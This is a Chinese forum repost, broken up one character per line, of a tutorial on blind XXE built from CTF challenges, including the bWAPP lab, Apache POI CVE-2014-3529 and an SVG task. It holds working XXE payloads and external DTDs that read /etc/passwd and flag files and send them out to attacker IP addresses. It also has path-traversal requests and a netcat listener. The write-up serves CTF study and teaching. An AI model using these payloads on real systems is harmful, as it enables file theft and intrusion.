论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[18157] 2020-10-10_从几道CTF题学习BlindXXE
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-18
IOT
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-10-10_从几道CTF题学习BlindXXE
从
几
道
C
T
F
题
学
习
B
l
i
n
d
X
X
E
0
x
d
a
w
n
H
A
C
K
之
道
2
0
2
0
-
1
0
-
1
0
作
者
:
0
x
d
a
w
n
,
来
源
:
先
知
社
区
0
x
0
0
前
言
前
言
对
于
传
统
的
X
X
E
来
说
,
攻
击
者
只
有
在
服
务
器
有
回
显
或
报
错
的
情
况
下
才
能
使
用
X
X
E
漏
洞
来
读
取
服
务
器
端
文
件
。
例
如
如
果
服
务
器
没
有
回
显
,
只
能
通
过
B
l
i
n
d
X
X
E
构
造
一
条
外
带
信
道
来
提
取
数
据
,
也
就
是
数
据
外
带
。
一
个
实
例
一
个
实
例
x
m
l
.
p
h
p
t
e
s
t
.
d
t
d
p
a
y
l
o
a
d
<
!
E
N
T
I
T
Y
f
i
l
e
S
Y
S
T
E
M
"
f
i
l
e
:
/
/
/
e
t
c
/
p
a
s
s
w
d
"
>
<
u
s
e
r
n
a
m
e
>
&
f
i
l
e
;
<
/
u
s
e
r
n
a
m
e
>
<
?
p
h
p
l
i
b
x
m
l
_
d
i
s
a
b
l
e
_
e
n
t
i
t
y
_
l
o
a
d
e
r
(
f
a
l
s
e
)
;
$
x
m
l
f
i
l
e
=
f
i
l
e
_
g
e
t
_
c
o
n
t
e
n
t
s
(
'
p
h
p
:
/
/
i
n
p
u
t
'
)
;
$
d
o
m
=
n
e
w
D
O
M
D
o
c
u
m
e
n
t
(
)
;
$
d
o
m
-
>
l
o
a
d
X
M
L
(
$
x
m
l
f
i
l
e
,
L
I
B
X
M
L
_
N
O
E
N
T
|
L
I
B
X
M
L
_
D
T
D
L
O
A
D
)
;
?
>
<
!
E
N
T
I
T
Y
%
f
i
l
e
S
Y
S
T
E
M
"
p
h
p
:
/
/
f
i
l
t
e
r
/
r
e
a
d
=
c
o
n
v
e
r
t
.
b
a
s
e
6
4
-
e
n
c
o
d
e
/
r
e
s
o
u
r
c
e
=
f
i
l
e
:
/
/
/
e
t
c
/
p
a
s
s
w
d
"
>
<
!
E
N
T
I
T
Y
%
i
n
t
"
<
!
E
N
T
I
T
Y
%
s
e
n
d
S
Y
S
T
E
M
'
h
t
t
p
:
/
/
i
p
:
2
3
3
3
?
p
=
%
f
i
l
e
;
'
>
"
>
调
用
过
程
调
用
过
程
1
.
%
r
e
m
o
t
e
请
求
远
程
v
p
s
上
的
t
e
s
t
.
d
t
d
2
.
%
i
n
t
调
用
t
e
s
t
.
d
t
d
中
的
%
f
i
l
e
3
.
%
f
i
l
e
获
取
服
务
器
上
的
敏
感
文
件
,
并
传
入
%
s
e
n
d
4
.
%
s
e
n
d
将
数
据
发
送
到
远
程
v
p
s
上
这
样
就
实
现
了
外
带
数
据
的
效
果
,
完
美
解
决
了
X
X
E
无
回
显
的
问
题
0
x
0
1
b
W
A
P
P
下
面
用
b
W
A
P
P
靶
场
来
示
例
一
下
有
回
显
X
X
E
和
无
回
显
的
区
别
有
回
显
有
回
显
X
X
E
点
击
A
n
y
b
u
g
s
抓
包
查
看
正
常
请
求
,
可
以
看
到
其
中
的
X
M
L
文
档
利
用
利
用
h
t
t
p
协
议
协
议
p
a
y
l
o
a
d
<
!
D
O
C
T
Y
P
E
c
o
n
v
e
r
t
[
<
!
E
N
T
I
T
Y
%
r
e
m
o
t
e
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
i
p
/
t
e
s
t
.
d
t
d
"
>
%
r
e
m
o
t
e
;
%
i
n
t
;
%
s
e
n
d
;
]
>
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
!
D
O
C
T
Y
P
E
t
e
s
t
[
<
!
E
N
T
I
T
Y
f
i
l
e
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
1
5
.
1
4
2
/
b
W
A
P
P
/
r
o
b
o
t
s
.
t
x
t
"
>
]
>
<
r
e
s
e
t
>
<
l
o
g
i
n
>
&
f
i
l
e
;
<
/
l
o
g
i
n
>
<
s
e
c
r
e
t
>
A
n
y
b
u
g
s
?
<
/
s
e
c
r
e
t
>
<
/
r
e
s
e
t
>
利
用
利
用
f
i
l
e
协
议
协
议
p
a
y
l
o
a
d
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
!
D
O
C
T
Y
P
E
t
e
s
t
[
<
!
E
N
T
I
T
Y
f
i
l
e
S
Y
S
T
E
M
"
f
i
l
e
:
/
/
/
e
t
c
/
p
a
s
s
w
d
"
>
]
>
<
r
e
s
e
t
>
<
l
o
g
i
n
>
&
f
i
l
e
;
<
/
l
o
g
i
n
>
<
s
e
c
r
e
t
>
A
n
y
b
u
g
s
?
<
/
s
e
c
r
e
t
>
<
/
r
e
s
e
t
>
利
用
利
用
p
h
p
伪
协
议
伪
协
议
p
a
y
l
o
a
d
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
!
D
O
C
T
Y
P
E
t
e
s
t
[
<
!
E
N
T
I
T
Y
f
i
l
e
S
Y
S
T
E
M
"
p
h
p
:
/
/
f
i
l
t
e
r
/
r
e
a
d
=
c
o
n
v
e
r
t
.
b
a
s
e
6
4
-
e
n
c
o
d
e
/
r
e
s
o
u
r
c
e
=
/
v
a
r
/
w
w
w
/
b
W
A
P
P
/
x
x
e
-
1
.
p
h
p
"
>
]
>
<
r
e
s
e
t
>
<
l
o
g
i
n
>
&
f
i
l
e
;
<
/
l
o
g
i
n
>
<
s
e
c
r
e
t
>
A
n
y
b
u
g
s
?
<
/
s
e
c
r
e
t
>
<
/
r
e
s
e
t
>
无
回
显
无
回
显
X
X
E
由
于
b
W
A
P
P
没
有
无
回
显
靶
场
,
这
里
用
来
测
试
一
下
数
据
外
带
的
思
路
我
们
先
在
v
p
s
上
传
一
个
t
e
s
t
.
d
t
d
文
件
,
内
容
如
下
p
a
y
l
o
a
d
<
!
E
N
T
I
T
Y
%
f
i
l
e
S
Y
S
T
E
M
"
p
h
p
:
/
/
f
i
l
t
e
r
/
r
e
a
d
=
c
o
n
v
e
r
t
.
b
a
s
e
6
4
-
e
n
c
o
d
e
/
r
e
s
o
u
r
c
e
=
f
i
l
e
:
/
/
/
e
t
c
/
p
a
s
s
w
d
"
>
<
!
E
N
T
I
T
Y
%
i
n
t
"
<
!
E
N
T
I
T
Y
%
s
e
n
d
S
Y
S
T
E
M
'
h
t
t
p
:
/
/
1
1
6
.
6
2
.
2
1
1
.
1
3
4
:
2
3
3
3
/
?
p
=
%
f
i
l
e
;
'
>
"
>
0
x
0
2
网
鼎
杯
网
鼎
杯
2
0
2
0
f
i
l
e
j
a
v
a
C
V
E
-
2
0
1
4
-
3
5
2
9
A
p
a
c
h
e
P
O
I
3
.
1
0
-
F
I
N
A
L
及
以
前
版
本
被
发
现
允
许
远
程
攻
击
者
通
过
注
入
X
M
L
外
部
实
体
访
问
外
部
实
体
资
源
或
者
读
取
任
意
文
件
。
影
响
范
围
影
响
范
围
p
o
i
-
o
o
x
m
l
-
3
.
1
0
-
F
I
N
A
L
.
j
a
r
及
以
下
版
本
利
用
文
件
利
用
文
件
[
C
o
n
t
e
n
t
-
T
y
p
e
s
]
.
x
m
l
漏
洞
利
用
漏
洞
利
用
1
.
新
建
t
e
s
t
.
x
l
s
x
文
件
,
修
改
后
缀
名
为
.
z
i
p
并
解
压
,
得
到
以
下
文
件
2
.
修
改
[
C
o
n
t
e
n
t
_
T
y
p
e
s
]
.
x
m
l
,
在
第
二
行
加
入
以
下
内
容
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
!
D
O
C
T
Y
P
E
t
e
s
t
[
<
!
E
N
T
I
T
Y
%
r
e
m
o
t
e
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
1
1
6
.
6
2
.
2
1
1
.
1
3
4
/
t
e
s
t
.
d
t
d
"
>
%
r
e
m
o
t
e
;
%
i
n
t
;
%
s
e
n
d
;
]
>
<
r
e
s
e
t
>
<
l
o
g
i
n
>
b
e
e
<
/
l
o
g
i
n
>
<
s
e
c
r
e
t
>
A
n
y
b
u
g
s
?
<
/
s
e
c
r
e
t
>
<
/
r
e
s
e
t
>
3
.
压
缩
成
z
i
p
后
再
修
改
后
缀
为
.
x
l
s
x
4
.
在
v
p
s
上
新
建
一
个
f
i
l
e
.
d
t
d
文
件
,
内
容
如
下
5
.
v
p
s
开
启
监
听
,
上
传
x
l
s
x
文
件
后
外
带
出
数
据
解
题
解
题
任
意
文
件
下
载
任
意
文
件
下
载
上
传
一
个
文
件
后
可
以
点
击
下
载
修
改
f
i
l
e
n
a
m
e
为
后
得
到
一
个
J
a
v
a
的
报
错
信
息
<
!
D
O
C
T
Y
P
E
c
o
n
v
e
r
t
[
<
!
E
N
T
I
T
Y
%
r
e
m
o
t
e
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
i
p
/
f
i
l
e
.
d
t
d
"
>
%
r
e
m
o
t
e
;
%
i
n
t
;
%
s
e
n
d
;
]
>
<
!
E
N
T
I
T
Y
%
f
i
l
e
S
Y
S
T
E
M
"
f
i
l
e
:
/
/
/
f
l
a
g
"
>
<
!
E
N
T
I
T
Y
%
i
n
t
"
<
!
E
N
T
I
T
Y
%
s
e
n
d
S
Y
S
T
E
M
'
h
t
t
p
:
/
/
i
p
:
2
3
3
3
?
p
=
%
f
i
l
e
;
'
>
"
>
.
.
/
这
里
用
目
录
穿
越
读
取
W
E
B
-
I
N
F
下
的
w
e
b
.
x
m
l
文
件
可
以
看
到
有
U
p
l
o
a
d
S
e
r
v
l
e
t
、
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
、
L
i
s
t
F
i
l
e
S
e
r
v
l
e
t
三
个
c
l
a
s
s
文
件
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
?
f
i
l
e
n
a
m
e
=
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
u
s
r
/
l
o
c
a
l
/
t
o
m
c
a
t
/
w
e
b
a
p
p
s
/
R
O
O
T
/
W
E
B
-
I
N
F
/
w
e
b
.
x
m
l
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
?
f
i
l
e
n
a
m
e
=
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
u
s
r
/
l
o
c
a
l
/
t
o
m
c
a
t
/
w
e
b
a
p
p
s
/
R
O
O
T
/
W
E
B
-
I
N
F
/
c
l
a
s
s
e
s
/
c
n
/
a
b
c
/
s
e
r
v
l
e
t
/
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
.
c
l
a
s
s
B
l
i
n
d
X
X
E
依
次
下
载
下
来
后
用
j
d
-
g
u
i
反
编
译
成
J
a
v
a
源
代
码
,
关
键
代
码
在
U
p
l
o
a
d
S
e
r
v
l
e
t
.
c
l
a
s
s
第
6
3
行
起
如
果
是
以
开
头
的
x
l
s
x
文
件
,
就
会
调
用
W
o
r
k
b
o
o
k
F
a
c
t
o
r
y
.
c
r
e
a
t
e
去
处
理
文
件
,
从
而
触
发
X
X
E
v
p
s
上
传
一
个
d
t
d
文
件
,
内
容
如
下
将
e
x
c
e
l
解
压
后
,
修
改
[
C
o
n
t
e
n
t
-
T
y
p
e
s
]
.
x
m
l
,
在
第
二
行
后
加
入
以
下
内
容
v
p
s
上
开
启
监
听
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
?
f
i
l
e
n
a
m
e
=
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
u
s
r
/
l
o
c
a
l
/
t
o
m
c
a
t
/
w
e
b
a
p
p
s
/
R
O
O
T
/
W
E
B
-
I
N
F
/
c
l
a
s
s
e
s
/
c
n
/
a
b
c
/
s
e
r
v
l
e
t
/
U
p
l
o
a
d
S
e
r
v
l
e
t
.
c
l
a
s
s
D
o
w
n
l
o
a
d
S
e
r
v
l
e
t
?
f
i
l
e
n
a
m
e
=
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
u
s
r
/
l
o
c
a
l
/
t
o
m
c
a
t
/
w
e
b
a
p
p
s
/
R
O
O
T
/
W
E
B
-
I
N
F
/
c
l
a
s
s
e
s
/
c
n
/
a
b
c
/
s
e
r
v
l
e
t
/
L
i
s
t
F
i
l
e
S
e
r
v
l
e
t
.
c
l
a
s
s
e
x
c
e
l
-
<
!
E
N
T
I
T
Y
%
f
i
l
e
S
Y
S
T
E
M
"
f
i
l
e
:
/
/
/
f
l
a
g
"
>
<
!
E
N
T
I
T
Y
%
i
n
t
"
<
!
E
N
T
I
T
Y
%
s
e
n
d
S
Y
S
T
E
M
'
h
t
t
p
:
/
/
1
7
4
.
2
.
7
3
.
6
5
:
2
3
3
3
?
p
=
%
f
i
l
e
;
'
>
"
>
<
!
D
O
C
T
Y
P
E
c
o
n
v
e
r
t
[
<
!
E
N
T
I
T
Y
%
r
e
m
o
t
e
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
1
7
4
.
2
.
7
3
.
6
5
/
x
x
e
.
d
t
d
"
>
%
r
e
m
o
t
e
;
%
i
n
t
;
%
s
e
n
d
;
]
>
n
c
-
l
v
v
p
2
3
3
3
0
x
0
3
D
o
z
e
r
C
T
F
2
0
2
0
s
v
g
g
g
g
g
g
!
!
s
v
g
简
介
简
介
S
V
G
是
一
种
图
像
文
件
格
式
,
它
的
英
文
全
称
为
S
c
a
l
a
b
l
e
V
e
c
t
o
r
G
r
a
p
h
i
c
s
,
意
思
为
可
缩
放
的
矢
量
图
形
。
它
是
基
于
X
M
L
(
E
x
t
e
n
s
i
b
l
e
M
a
r
k
u
p
L
a
n
g
u
a
g
e
)
,
由
W
o
r
l
d
W
i
d
e
W
e
b
C
o
n
s
o
r
t
i
u
m
(
W
3
C
)
联
盟
进
行
开
发
的
。
S
V
G
是
一
种
用
X
M
L
定
义
的
语
言
,
使
用
X
M
L
格
式
定
义
图
形
。
S
V
G
文
件
是
纯
粹
的
X
M
L
。
s
v
g
x
x
e
既
然
s
v
g
也
是
x
m
l
格
式
,
自
然
可
以
用
来
x
x
e
,
下
面
给
出
有
回
显
和
盲
打
的
p
a
y
l
o
a
d
有
回
显
有
回
显
x
x
e
.
s
v
g
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT